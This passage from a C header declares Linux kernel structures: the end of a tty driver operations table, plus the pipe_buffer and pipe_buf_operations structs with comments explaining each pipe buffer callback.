void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif